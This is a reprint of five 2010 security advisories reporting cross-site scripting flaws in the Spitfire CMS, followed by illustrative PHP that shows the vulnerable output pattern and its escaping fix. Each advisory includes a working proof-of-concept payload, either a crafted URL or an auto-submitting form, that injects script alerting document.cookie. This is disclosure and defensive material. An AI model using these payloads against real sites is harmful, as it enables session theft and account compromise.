Spitfire 1.0.336 Cross Site Scripting

2010-07-23T00:00:00
ID PACKETSTORM:92086
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-07-23T00:00:00

Description

============================================================  
Vulnerability ID: HTB22482  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
A user can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists because the "/site/cont_index.php" script fails to properly sanitize user-supplied input in the "cms_id" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.  
  
An attacker can use a browser to exploit this vulnerability. The following PoC is available:  
http://host/site/cont_index.php?cms_id=PAGE_ID"><script>alert(document.cookie)</script>  
  
============================================================  
Vulnerability ID: HTB22483  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_search.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
A user can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists because the "/site/cont_index.php" script fails to properly sanitize user-supplied input in the "search" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.  
  
An attacker can use a browser to exploit this vulnerability. The following PoC is available:  
http://host/site/cont_index.php?cms_id=PAGE_ID&search=1"><script>alert(document.cookie)</script>  
  
============================================================  
Vulnerability ID: HTB22484  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_1.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
A user can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists because the "tpl_element_settings_action.php" script fails to properly sanitize user-supplied input in the "value[description]" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.  
  
An attacker can use a browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/cms//edit/tpl_element_settings_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="save" />  
<input type="hidden" name="value[description]" value='descr2"><script>alert(document.cookie)</script>' />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
============================================================  
Vulnerability ID: HTB22485  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_2.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
A user can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists because the "tpl_backup_action.php" script fails to properly sanitize user-supplied input in the "text" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.  
  
An attacker can use a browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/cms/edit/tpl_backup_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="message" />  
<input type="hidden" name="text" value='help text<img src=x onerror=alert(document.cookie)>' />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
  
============================================================  
Vulnerability ID: HTB22486  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_3.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Low   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
A user can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists because the "tpl_edit_action.php" script fails to properly sanitize user-supplied input in the "value[headline]" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.  
  
An attacker can use a browser to exploit this vulnerability. The following PoC is available:  
First code:  
  
<form action="http://host/cms//edit/tpl_edit_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="save" />  
<input type="hidden" name="value[headline]" value='headl2<img src=x onerror=alert(234)>' />  
<input type="hidden" name="winid" value="0" />  
</form>  
<script>  
document.main.submit();  
</script>  
  
Second code:  
  
<form action="http://host/cms//edit/tpl_edit_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="value" />  
<input type="hidden" name="tabid" value="headline" />  
<input type="hidden" name="winid" value="0" />  
</form>  
<script>  
document.main.submit();  
</script>  
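All five findings above are the same defect, request input written into HTML without output encoding, in two contexts: inside a quoted attribute (cms_id, search, value[description]) and in the page body (text, value[headline]). The PHP below is an added illustration and not Spitfire's source: the render functions, template strings and the is_inert check are hypothetical, and the inputs are constructed from the shape of the advisory's PoC strings.

```php
<?php
// Added illustration (not Spitfire's code): the two output contexts the PoCs
// target, and the escaping that neutralises them. Names are hypothetical.

// Vulnerable pattern: request values pasted straight into an attribute value
// and into the page body. A cms_id of  PAGE_ID"><script>...  closes the
// quoted attribute and the tag, so the browser runs the script.
function render_unsafe(string $cms_id, string $text): string
{
    return '<a href="cont_index.php?cms_id=' . $cms_id . '">page</a>'
         . "\n<p>" . $text . '</p>';
}

// Hardened pattern: encode at the sink, for the context the value lands in.
// ENT_QUOTES entity-encodes both quote characters, so an attribute value
// cannot be broken out of; < and > become &lt; and &gt;, so an injected
// <img onerror=...> in the body is inert text.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $cms_id, string $text): string
{
    // A value inside a query string is URL-encoded first, then HTML-encoded
    // because the whole URL sits inside an attribute.
    $href = 'cont_index.php?cms_id=' . rawurlencode($cms_id);
    return '<a href="' . esc($href) . '">page</a>'
         . "\n<p>" . esc($text) . '</p>';
}

// True when the markup contains no tag other than the <a> and <p> we emitted.
function is_inert(string $html): bool
{
    return preg_match('/<(?!\/?(a|p)\b)/i', $html) === 0;
}

// Constructed inputs in the shape of the advisory's PoC payloads.
$attr_payload = 'PAGE_ID"><script>alert(document.cookie)</script>';
$body_payload = 'help text<img src=x onerror=alert(document.cookie)>';

$unsafe = render_unsafe($attr_payload, $body_payload);
$safe   = render_safe($attr_payload, $body_payload);

printf("unsafe output inert: %s\n", is_inert($unsafe) ? 'yes' : 'no');
printf("safe output inert:   %s\n", is_inert($safe) ? 'yes' : 'no');
echo $safe, PHP_EOL;
```

The three POST-based PoCs also depend on an auto-submitted cross-site form reaching the edit actions, so a per-request anti-CSRF token on those actions is a second, independent mitigation alongside output encoding.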